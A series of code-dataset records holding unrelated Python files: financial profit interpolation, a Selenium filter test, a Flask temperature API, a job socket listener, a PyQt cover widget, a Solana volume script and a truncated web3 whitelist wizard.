dateCom.append((oneDate,comPro[index][0]))\n # # print(comPro[:10])\n # # break\n # #研究一下所有的公司\n # showComs = list(set(showComs))\n # # 获取这些公司的数据\n # x = dates\n # ys = []\n # for oneCompanyName in showComs:\n # temYs = []\n # for onex in x:\n # try:\n # temYs.append(\n # date2Company2Profit[onex][oneCompanyName]/date2Sum[onex]\n # )\n # except:\n # # print(onex,oneCompanyName)#大部分是退市\n # temYs.append(0)\n # ys.append(temYs)\n #画图看看】\n # print(showComs)\n # plotManyLines(x,ys,\"时间\",\"盈利/亏损市场占比\",showComs)\n #手工剔除 (dates,names)\n # return []\n # needR = [[20140331,'温氏食品集团股份有限公司'],[20140930,'獐子岛集团股份有限公司'],\n # [20141231,'獐子岛集团股份有限公司'],[20150331,'獐子岛集团股份有限公司'],[20220331,'江西正邦科技股份有限公司'],]\n needR = [[20140331,'温氏食品集团股份有限公司'],[20140930,'獐子岛集团股份有限公司'],\n [20141231,'獐子岛集团股份有限公司'],[20220630,'江西正邦科技股份有限公司'],[20220331,'江西正邦科技股份有限公司'],\n [20211231,'温氏食品集团股份有限公司'],[20211231,'江西正邦科技股份有限公司'],]\n # [20211231,'新希望六和股份有限公司'],\n # [20211231,'天邦食品股份有限公司']]\n # companys,dates = [],[]\n # return companys,dates\n return needR\n \n def quarterFix(self,date2Company2Profit,nextStep=4,dealK=0):#修正季度利润率增长,得到增长\n quaters,values = [],[]\n self.date2Company2Profit = date2Company2Profit\n date_pairs = []\n dates = sorted(list(self.date2Company2Profit.keys()))\n # print(dates)\n '''获取每一期的对应的now date 和 pre date'''\n for index in range(len(dates)):\n if index ==0:\n continue\n preStep = min(index,nextStep)\n before,after = [],[]\n for i in range(preStep):\n before.append(dates[index-i-1])\n after.append(dates[index-i])\n date_pairs.append([dates[index],before,after])\n # if nextStep ==4:\n # for i in date_pairs:\n # print(i)\n # print(len(self.dates2CompanySame(i[1],i[2])))\n # print(\"=======================\")\n '''计算每一个data_pair的绝对值'''\n for oneQuater in date_pairs:\n # print(oneQuater)\n companys = self.dates2CompanySame(oneQuater[1],oneQuater[2])\n quaters.append(str(oneQuater[0]))\n # print(oneQuater[2],oneQuater[1])\n # print(oneQuater[0],oneQuater[1],oneQuater[2])\n after = self.sumprofits(oneQuater[2],companys)\n before = self.sumprofits(oneQuater[1],companys)\n before += dealK\n after += dealK\n # print(oneQuater[0],round((after-before)/abs(before),2),oneQuater[2],after,oneQuater[1],before)\n # print((self.sumprofits(oneQuater[2],companys),self.sumprofits(oneQuater[1],companys)))\n values.append(\n (after-before)/abs(before)\n # (self.sumprofits(oneQuater[2],companys)/self.sumprofits(oneQuater[1],companys))-1\n )\n # plotOne(quaters[37:-30],values[37:-30],\"日期\",\"利润增长率\")\n return quaters,values\n\n def quarter2Month(self,quarters,values):#将利润率增长进行插值 季度转为月度\n oneInfo = namedtuple('oneInfo','year,month,value,monthStr')\n print(quarters)\n quarterRate = []\n monthes,newValues = [],[]\n # 转化成month 数据格式\n for (index,oneQuarter) in enumerate(quarters):\n oneQuarter = str(oneQuarter)\n year = int(oneQuarter[:4])\n month = int(oneQuarter[4:6])\n quarterRate.append(oneInfo(year,month,values[index],oneQuarter[4:6]))\n #进行插值\n monthes.append(f\"{quarterRate[0].year}-{fomartMonth(quarterRate[0].month)}\")\n newValues.append(quarterRate[0].value)\n for (index,oneQuarter) in enumerate(quarterRate[1:]):\n beforeQuarter,nowQaurter = quarterRate[index],oneQuarter\n differ = (nowQaurter.value-beforeQuarter.value)/3#固定值\n for i in range(1,3):\n monthes.append(f\"{oneQuarter.year}-{fomartMonth((beforeQuarter.month+i)%12)}\")\n newValues.append(\n beforeQuarter.value+differ*i\n )\n monthes.append(f\"{nowQaurter.year}-{fomartMonth(nowQaurter.month)}\")\n newValues.append(nowQaurter.value)\n # plotOne(monthes[111:-90],newValues[111:-90],\"日期\",\"净利润\")\n return monthes,newValues\n \n # def getQuater2Monteh(date2Company2Profit):\n # quaters,values = [],[]\n # self.date2Company2Profit = date2Company2Profit\n # date_pairs = []\n # dates = sorted(list(self.date2Company2Profit.keys()))\n def getProFitSelf(self,date2Company2Profit:dict):\n monthes,values = [],[]\n dates = list(date2Company2Profit.keys())\n dates.sort()\n for oneDate in dates:\n values.append(sum(\n [ date2Company2Profit[oneDate][i] for\\\n i in date2Company2Profit[oneDate]]\n ))\n monthes.append(oneDate)\n return monthes,values\n\n\n \n\n ''' removeOutliers()->获取要展示的公司'''\n def showImportantC(self,date2Company2Profit,date2Sum,K):\n showComs = []\n dates =list( date2Company2Profit.keys())\n dates.sort()\n for oneDate in dates:\n comPro = []#(公司名,获利)\n showProf = []\n for oneCompany in date2Company2Profit[oneDate]:\n comPro.append((oneCompany,date2Company2Profit[oneDate][oneCompany]))\n comPro.sort(key=lambda x:x[1],reverse=True)\n #获利max\n for index in range(min(K,len(comPro))):\n showComs.append(comPro[index][0])\n showProf.append(comPro[index][0])\n # if oneDate == 20211231:\n # print(showProf)\n #损失max\n comPro.sort(key=lambda x:x[1])\n for index in range(min(K,len(comPro))):\n showComs.append(comPro[index][0])\n showProf.append(comPro[index][0])\n # if oneDate == 20211231:\n # print(showProf)\n #研究一下所有的公司\n showComs = list(set(showComs))\n # 获取这些公司的数据\n x = dates\n ys = []\n for oneCompanyName in showComs:\n temYs = []\n for onex in x:\n try:\n temYs.append(\n date2Company2Profit[onex][oneCompanyName]/date2Sum[onex]\n )\n except:\n # print(onex,oneCompanyName)#大部分是退市\n temYs.append(0)\n ys.append(temYs)\n # showComs.sort()\n return x,ys,showComs\n '''quaterFix()->获取共同大的公司'''\n def dates2CompanySame(self,before,after):\n dates = list(set(before)|set(after))\n companys = []\n for oneDate in dates:\n companys.extend(list(\n self.date2Company2Profit[oneDate].keys()\n ))\n sameCompanys = []\n com2Num = Counter(companys)\n for oneCompany in com2Num:\n if com2Num[oneCompany] == len(dates):\n sameCompanys.append(oneCompany)\n return sameCompanys\n '''quaterFix()->计算利润总额'''\n def sumprofits(self,dates,companyNames):\n # print(dates)\n temProfits = 0\n for oneDate in dates:\n for oneCom in companyNames:\n if not np.isnan(self.date2Company2Profit[oneDate][oneCom]):\n temProfits += self.date2Company2Profit\\\n [oneDate][oneCom]\n return temProfits\n\n '''暂时不使用'''\n def monthFix(self,monthes,values):#修正月度利润率-目前不使用\n resMonth,upRates = [],[]\n month2Value = {i:j for (i,j) in zip(monthes,values)}\n for (index,oneMonth) in enumerate(monthes):\n if index < 15:\n continue\n beforeMonth = [ monthes[index-i-3] for i in range(12)]\n afterMonth = [monthes[index-i] for i in range(15)]\n resMonth.append(oneMonth)\n sum12 = sum([float(month2Value[i]) for i in beforeMonth])\n sum15 = sum([float(month2Value[i]) for i in afterMonth])\n absSum12 = sum([abs(float(month2Value[i])) for i in beforeMonth])\n upRates.append(\n (sum15-sum12)/absSum12\n )\n # print(oneMonth,beforeMonth,afterMonth)\n # plotOne(resMonth,upRates,\"日期\",\"净利润增长\")\n return resMonth,upRates\n def quarter2MonthProfit(self,quarters,values):#将利润率从季度转为月度 暂时不用\n oneInfo = namedtuple('oneInfo','year,month,value')\n quaterRate,monthProfit = [],[]\n #提取月份信息\n for (index,oneQuater) in enumerate(quarters):\n oneQuater = str(oneQuater)\n year = int(oneQuater[:4])\n month = int(oneQuater[4:6])\n quaterRate.append(oneInfo(year,month,values[index]))\n monthProfit.append(quaterRate[0])\n #进行插值操作\n for (index,oneState) in enumerate(quaterRate[1:]):\n beforeQuater,nowQauter = quaterRate[index],oneState\n differ = (nowQauter.value-beforeQuater.value)/3#固定值\n for i in range(1,3):\n monthProfit.append(\n oneInfo(nowQauter.year,(beforeQuater.month+i)%12,beforeQuater.value+differ*i)\n )\n monthProfit.append(nowQauter)\n monthes,values = [],[]\n # for oneRate in monthProfit[162:-90]:\n for oneRate in monthProfit[162:-90]:\n monthes.append(f\"{oneRate.year}-{oneRate.month}\")\n values.append(oneRate.value)\n # plotOne(monthes,values,\"日期\",\"净利润\")\n return monthes,values\n\nclass dealX:\n def __init__(self):\n pass\n def do_TTM(self,monthes,values):#月度x的\n '''按照目前的理解简单的做平均?'''\n month2V = {i:j for (i,j) in zip(monthes,values)}\n newValues ,newMonthes= [],[]\n for i in range(len(monthes)):\n # if i<12:\n # continue\n up = min(i,12)\n # print(monthes[i])\n newMonth = monthes[i-up:i+1]\n newValues.append(\n # sum([month2V[i] for i in newMonth])/len(newMonth)\n sum([month2V[i] for i in newMonth])/len(newMonth)\n )\n newMonthes.append(monthes[i])\n # print(values)\n # print(newValues)\n\n return newMonthes,newValues\n def do_value2Rate(self,monthes,values):\n newMonthes,newVal = [],[]\n # print(values)\n for (index,oneMonth) in enumerate(monthes[1:]):\n newRate = (values[index+1]-values[index])/values[index]\n newVal.append(newRate)\n newMonthes.append(oneMonth)\n return newMonthes,newVal", "repo_name": "wangzihan11/paper_recreate", "sub_path": "量化基本面系列研究之三--“量化基本面”理论体系及农林牧渔行业案例-中信建投/复现代码/dealData.py", "file_name": "dealData.py", "file_ext": "py", "file_size_in_byte": 13563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "collections.namedtuple", "line_number": 127, "usage_type": "call"}, {"api_name": "untils.fomartMonth", "line_number": 138, "usage_type": "call"}, {"api_name": "untils.fomartMonth", "line_number": 144, "usage_type": "call"}, {"api_name": "untils.fomartMonth", "line_number": 148, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 235, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 260, "usage_type": "call"}]} +{"seq_id": "4038169865", "text": "import time\r\nimport unittest\r\nimport sys\r\nimport os, config, Selectors\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\n\r\nclass Int_Filter(unittest.TestCase):\r\n \r\n def __init__(self, filterWord, column, myPyDriver, wait): \r\n self.myPyDriver = myPyDriver\r\n self.wait = wait\r\n selector_object = Selectors.Selectors()\r\n self.catalogFilterMenuXPath = selector_object.catalogFilterMenuXPath\r\n self.filterClearButtonXPath = selector_object.filterClearButtonXPath\r\n self.filterTextBar1XPath = selector_object.filterTextBar1XPath\r\n self.catalogFilterButton = selector_object.catalogFilterButton\r\n self.xyiconGridRow = selector_object.xyiconGridRow\r\n self.filterSubmitButtonXPath = selector_object.filterSubmitButtonXPath\r\n \r\n _filter = filterWord\r\n filterXpath = \"//th[\"+str(column)+\"]/a/span\"\r\n for i in range(1,7): \r\n time.sleep(1)\r\n filterButton = self.myPyDriver.find_element_by_xpath(filterXpath)\r\n time.sleep(1)\r\n filterButton.click()\r\n self.wait.until(EC.presence_of_all_elements_located((By.XPATH,self.filterTextBar1XPath))) \r\n time.sleep(1) \r\n self.wait.until(EC.element_to_be_clickable((By.XPATH,self.catalogFilterButton))).click()\r\n time.sleep(1)\r\n self.wait.until(EC.presence_of_all_elements_located((By.TAG_NAME,'li'))) \r\n self.currentFilter = self.myPyDriver.find_element_by_xpath(self.catalogFilterMenuXPath+\"[\"+str(i)+\"]\")\r\n self.currentFilter.click()\r\n self.textBar = self.myPyDriver.find_element_by_xpath(self.filterTextBar1XPath)\r\n self.textBar.clear()\r\n time.sleep(1)\r\n #self.textBar.click()\r\n \r\n count = 1\r\n self.upButton = self.myPyDriver.find_element_by_xpath('//span[2]/span/span/span/span')\r\n while(count<=int(_filter)):\r\n self.upButton.click()\r\n count = count + 1;\r\n self.myPyDriver.find_element_by_xpath(self.filterSubmitButtonXPath).click() \r\n \r\n table = self.myPyDriver.find_elements_by_xpath(self.xyiconGridRow)\r\n for tr in table:\r\n tds = tr.find_elements_by_tag_name('td')\r\n currentText = str(tds[(column-1)].text).lower()\r\n if(i == 1):\r\n self.assertTrue(_filter == currentText)\r\n if(i == 2):\r\n self.assertTrue(_filter != currentText)\r\n if(i == 3):\r\n self.assertTrue(int(_filter) <= int(currentText))\r\n if(i == 4):\r\n self.assertTrue(int(_filter) < int(currentText))\r\n if(i == 5):\r\n self.assertTrue(int(_filter) >= int(currentText))\r\n if(i == 6):\r\n self.assertTrue(int(_filter) > int(currentText))\r\n time.sleep(1)\r\n \r\n self.myPyDriver.find_element_by_xpath(filterXpath).click()\r\n time.sleep(1)\r\n self.wait.until(EC.element_to_be_clickable((By.XPATH,self.filterClearButtonXPath))).click()\r\n\r\n\r\n", "repo_name": "arramabbott/PySrTest", "sub_path": "Int_Filter.py", "file_name": "Int_Filter.py", "file_ext": "py", "file_size_in_byte": 3317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "Selectors.Selectors", "line_number": 15, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_all_elements_located", "line_number": 30, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 30, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 30, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 30, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 32, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 32, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 32, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 33, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_all_elements_located", "line_number": 34, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 34, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 34, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 34, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 69, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 69, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 69, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "17915955005", "text": "#Tejada, John Michael T. CPE41S2\n\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n# 1. Create a REST API using FLASK and insert a new temperature record to a JSON file. \n# The temperature information is composed of temp_id, date, and temperature. (2 points)\ntemperatures = [\n\n {\n \"temp_id\" : 0,\n \"date\" : \"09-28-2022\",\n \"temperature\" : \"32°C\"\n },\n\n {\n \"temp_id\" : 1,\n \"date\" : \"09-29-2022\",\n \"temperature\" : \"33°C\"\n }\n\n]\n\n# 2, Create a REST API using FLASK to read temperature information from a JSON file. \n# The temperature information is composed of temp_id, date, and temperature. (2 points)\n@app.route('/temperatures', methods=['GET'])\ndef displayTemp():\n\n return jsonify(temperatures)\n\n# 3. Create a REST API using FLASK to read the temperature information of a specific temperature id from a JSON file. \n# The temperature information is composed of temp_id, date, and temperature (2 points)\n@app.route('/temperatures/', methods=['GET'])\ndef displayById(indexd):\n\n return jsonify(temperatures[index])\n\n# 4. Create a REST API using FLASK to update a temperature record of a specific temperature_id. \n# The temperature information is composed of temp_id, date, and temperature (2 points)\n@app.route('/temperatures', methods=['POST'])\ndef addTemp():\n\n temperature = request.get_json()\n temperatures.append(temperature)\n return {'id': len(temperatures)},200\n\n\n# 5. Create a REST API using FLASK to delete a temperature record of a specific temperature_id. \n# The temperature information is composed of temp_id, date, and temperature (2 points).\n@app.route('/temperatures/', methods=['DELETE'])\ndef deleteTempe(index):\n temperatures.pop(index)\n return 'Temperature was successfully deleted', 200\n\nif __name__ == '__main__':\n\n app.run()", "repo_name": "qjmttejada/temperaturefiles", "sub_path": "temperature.py", "file_name": "temperature.py", "file_ext": "py", "file_size_in_byte": 1862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "18508656159", "text": "import socket\nimport ensicoin\nimport json\nimport solidator\nimport database\nimport os\nimport shutil\n\nTCP_IP = \"0.0.0.0\"\nTCP_PORT = 2442\n\n\ndef listen():\n listener = socket.socket()\n listener.bind((TCP_IP, TCP_PORT))\n listener.listen()\n\n while True:\n conn, _ = listener.accept()\n\n print(\"connection accepted\")\n\n data = conn.recv(66).decode()\n\n print(\"data:\", data)\n\n _, flags = ensicoin.wait_for_pubkey(data)\n\n print(\"flags: \", flags)\n\n segments = None\n job_id = None\n\n if flags[0][0] == \"[\":\n segments = json.loads(flags[0])\n job_id = flags[1]\n\n if flags[1][0] == \"[\":\n segments = json.loads(flags[1])\n job_id = flags[0]\n\n print(\"segments: \", segments)\n print(\"job_id: \", job_id)\n\n database.update_state(database.open_db(), 26, job_id)\n\n print(\"saving results\")\n \n points = solidator.create_points(segments)\n os.mkdir(job_id)\n os.chdir(job_id)\n solidator.remove_deg_1(points, job_id, True)\n\n result = open(\"result.svg\", \"r\")\n svg_data = result.read()\n result.close()\n\n os.chdir(\"..\")\n shutil.rmtree(job_id)\n\n database.open_db().write(\"/{}/result\".format(job_id), svg_data)\n database.update_state(database.open_db(), 31, job_id)\n\nif __name__ == \"__main__\":\n print('starting solidator')\n listen()\n", "repo_name": "traxys/micro-tiling", "sub_path": "Solidator/ensicoin_waiter.py", "file_name": "ensicoin_waiter.py", "file_ext": "py", "file_size_in_byte": 1437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "socket.socket", "line_number": 14, "usage_type": "call"}, {"api_name": "ensicoin.wait_for_pubkey", "line_number": 27, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 39, "usage_type": "call"}, {"api_name": "database.update_state", "line_number": 45, "usage_type": "call"}, {"api_name": "database.open_db", "line_number": 45, "usage_type": "call"}, {"api_name": "solidator.create_points", "line_number": 49, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 50, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 51, "usage_type": "call"}, {"api_name": "solidator.remove_deg_1", "line_number": 52, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 58, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 59, "usage_type": "call"}, {"api_name": "database.open_db", "line_number": 61, "usage_type": "call"}, {"api_name": "database.update_state", "line_number": 62, "usage_type": "call"}, {"api_name": "database.open_db", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "2447225672", "text": "from typing import Callable, Optional, Union\n\nfrom PyQt5.QtCore import QEasingCurve, Qt, QVariantAnimation\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QLabel, QWidget\n\nfrom modules.helpers import Pixmaps\nfrom modules.helpers.types.Bytes import Bytes\n\n\nclass CoverProp:\n __created_covers: dict['CoverProp', QPixmap] = {}\n\n def __init__(self,\n data: bytes,\n width: int,\n height: int,\n radius: int,\n ):\n self.__data: bytes = data\n self.__pixmap: QPixmap | None = None\n self.__width: int = width\n self.__height: int = height\n self.__radius: int = radius\n\n def __eq__(self, o: 'CoverProp') -> bool:\n return (\n self.__data == o.__data and\n self.__width == o.__width and\n self.__height == o.__height and\n self.__radius == o.__radius\n )\n\n def __hash__(self) -> int:\n return hash((Bytes.decode(self.__data), self.__width, self.__height, self.__radius))\n\n def __set_pixmap(self, pixmap: QPixmap) -> None:\n self.__pixmap = pixmap\n\n def data(self) -> bytes:\n return self.__data\n\n def radius(self) -> int:\n return self.__radius\n\n def content(self) -> QPixmap:\n return self.__pixmap\n\n @staticmethod\n def from_bytes(\n image_byte: bytes,\n width: int = 0,\n height: int = 0,\n radius: int = 0,\n crop_center: bool = True,\n ) -> Union['CoverProp', None]:\n cover = CoverProp(image_byte, width, height, radius)\n if cover in CoverProp.__created_covers:\n pixmap = CoverProp.__created_covers[cover]\n cover.__set_pixmap(pixmap)\n return cover\n\n pixmap = Pixmaps.get_pixmap_from_bytes(image_byte)\n if pixmap.isNull():\n return None\n if width > 0 or height > 0:\n pixmap = Pixmaps.scale_pixmap_keeping_ratio(pixmap, max(width, height))\n pixmap = Pixmaps.crop_pixmap(pixmap, width, height, crop_center)\n if radius > 0:\n pixmap = Pixmaps.round_pixmap(pixmap, radius)\n\n cover.__set_pixmap(pixmap)\n CoverProp.__created_covers[cover] = pixmap\n return cover\n\n\nclass Cover(QLabel):\n __default_cover: CoverProp\n __current_cover: CoverProp\n __value: float = 0\n __start: float = 0\n __end: float = 0\n __radius: int = 0\n __animation: QVariantAnimation\n\n def __init__(self, parent: Optional[\"QWidget\"] = None):\n QLabel.__init__(self, parent)\n\n def set_default_cover(self, cover: CoverProp) -> None:\n self.__default_cover = cover\n self.set_cover(cover)\n\n def current_cover(self) -> CoverProp:\n return self.__current_cover\n\n def set_radius(self, radius: int) -> None:\n self.__radius = radius\n\n def set_cover(self, cover: CoverProp) -> None:\n if cover is None:\n cover = self.__default_cover\n\n self.__current_cover = cover\n self.set_radius(cover.radius())\n super().setPixmap(cover.content())\n\n def set_animation(self, duration: float, start: float, end: float, on_value_changed: Callable) -> None:\n self.__start = start\n self.__end = end\n self.__animation = QVariantAnimation(self, valueChanged=on_value_changed, duration=duration)\n self.__animation.setEasingCurve(QEasingCurve.OutCubic)\n\n def zoom(self, value: float) -> None:\n self.__value = value\n if self.__current_cover is None:\n return\n pixmap = self.__current_cover.content().copy()\n pixmap = pixmap.scaledToHeight(int(self.height() * value), Qt.SmoothTransformation)\n pixmap = Pixmaps.crop_pixmap(pixmap, self.width(), self.height())\n pixmap = Pixmaps.round_pixmap(pixmap, radius=self.__radius)\n self.__set_hover_pixmap(pixmap)\n\n def animation_on_entered_hover(self) -> None:\n if self.__animation is None:\n return\n self.__animation.stop()\n self.__animation.setStartValue(self.__start)\n self.__animation.setEndValue(self.__end)\n self.__animation.start()\n\n def animation_on_left_hover(self) -> None:\n if self.__animation is None:\n return\n self.__animation.setStartValue(self.__value)\n self.__animation.setEndValue(self.__start)\n self.__animation.start()\n\n def __set_hover_pixmap(self, pixmap: QPixmap) -> None:\n super().setPixmap(pixmap)\n", "repo_name": "Ananta0810/Meelody", "sub_path": "modules/widgets/Cover.py", "file_name": "Cover.py", "file_ext": "py", "file_size_in_byte": 4482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PyQt5.QtGui.QPixmap", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 21, "usage_type": "name"}, {"api_name": "modules.helpers.types.Bytes.Bytes.decode", "line_number": 35, "usage_type": "call"}, {"api_name": "modules.helpers.types.Bytes.Bytes", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 46, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.get_pixmap_from_bytes", "line_number": 63, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 63, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.scale_pixmap_keeping_ratio", "line_number": 67, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.crop_pixmap", "line_number": 68, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 68, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.round_pixmap", "line_number": 70, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 56, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QVariantAnimation", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 86, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel.__init__", "line_number": 87, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 107, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QVariantAnimation", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QEasingCurve.OutCubic", "line_number": 111, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.QEasingCurve", "line_number": 111, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.SmoothTransformation", "line_number": 118, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 118, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.crop_pixmap", "line_number": 119, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 119, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.round_pixmap", "line_number": 120, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 120, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 138, "usage_type": "name"}]} +{"seq_id": "38905871856", "text": "import json\nimport os\nimport time\nimport requests\n\nnow = int(time.time())\n\nAPI_KEY = \"\"\nwl = json.load(open(\"whitelist.json\"))\n\nfrom collections import namedtuple\nResponse = namedtuple('Response', ['status_code'])\n\ncounter_it = 0\nfor i in wl:\n\n url = \"https://beta.api.solanalysis.com/rest/get-project-stat-hist\"\n if not i['hyperspaceSlug']:\n print(i['name'])\n continue\n\n payload = json.dumps({\n \"conditions\": {\n \"project_ids\": [\n i['hyperspaceSlug']\n ],\n \"start_timestamp\": now - 86400*7,\n \"end_timestamp\": now,\n \"time_granularity\": \"PER_DAY\"\n },\n \"pagination_info\": {\n \"page_number\": 1,\n \"page_size\": 10\n }\n })\n headers = {\n 'Authorization': API_KEY,\n 'Content-Type': 'application/json'\n }\n response = Response(500)\n counter = 0\n while response.status_code != 200:\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n time.sleep(5)\n counter += 1\n if counter > 30:\n print(i['hyperspaceSlug'])\n print(i['name'])\n break\n if response.status_code != 200 :\n print(response)\n print(i['hyperspaceSlug'])\n volume = 0\n for j in response.json()['project_stat_hist_entries']:\n volume += j['volume']\n i['volume7d'] = volume\n if i['tier'] == 1:\n i['volume_with_tiers'] = i['volume7d'] * 1.25\n elif i['tier'] == 2:\n i['volume_with_tiers'] = i['volume7d'] * 0.7\n else:\n i['volume_with_tiers'] = i['volume7d'] * 0.3\n if counter_it % 10 == 0:\n print(counter_it)\n counter_it += 1\n\nwith open(\"whitelist.json\", \"w\") as file:\n json.dump(wl, file, indent = 1)\n", "repo_name": "frakt-solana/nft_lending_protocol_whitelist", "sub_path": "update_volume.py", "file_name": "update_volume.py", "file_ext": "py", "file_size_in_byte": 1601, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 6, "usage_type": "call"}, {"api_name": "json.load", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 43, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "27090436730", "text": "import getpass\nimport json\nimport os\nimport sys\nimport time\n\nfrom web3 import Web3, IPCProvider\n\nglobals()['masterchain_dir_path'] = '~/masterchain/masterchain_data/'\nglobals()['meth_ipc_path'] = str(\"~/masterchain/masterchain_data/meth.ipc\")\nw3 = Web3()\n\n\ndef welcome_message():\n print(\"WELCOME TO WHITELIST MANAGEMENT WIZARD\\n\")\n update_provider_addr('ipc')\n\n\ndef update_provider_addr(provider_type):\n if provider_type == 'ipc':\n print(\"IPC provider selected. Default provider location: \" + globals()['meth_ipc_path'])\n addr = str(input(\"Please provide full path to IPC or press Enter to use default: \"))\n if addr == \"\":\n print(\"Using default addr \" + globals()['meth_ipc_path'])\n else:\n print(\"Using new addr \" + addr)\n globals()['meth_ipc_path'] = addr\n\n\ndef init_vars():\n global w3\n w3 = Web3(IPCProvider(globals()['meth_ipc_path']))\n\n\ndef check_status():\n print(\"\\n ***Checking node status*** \\n \")\n last_block = w3.eth.blockNumber\n is_mining = w3.eth.mining\n\n print(\"*Last block: \" + str(last_block))\n print(\"*Mining enabled? \" + str(is_mining))\n\n if not is_mining:\n print(\"*Enabling mining...\")\n w3.miner.start(1)\n print(\"*Waiting for new block...\")\n while w3.eth.blockNumber == last_block:\n print('*', end='')\n time.sleep(10)\n\n if 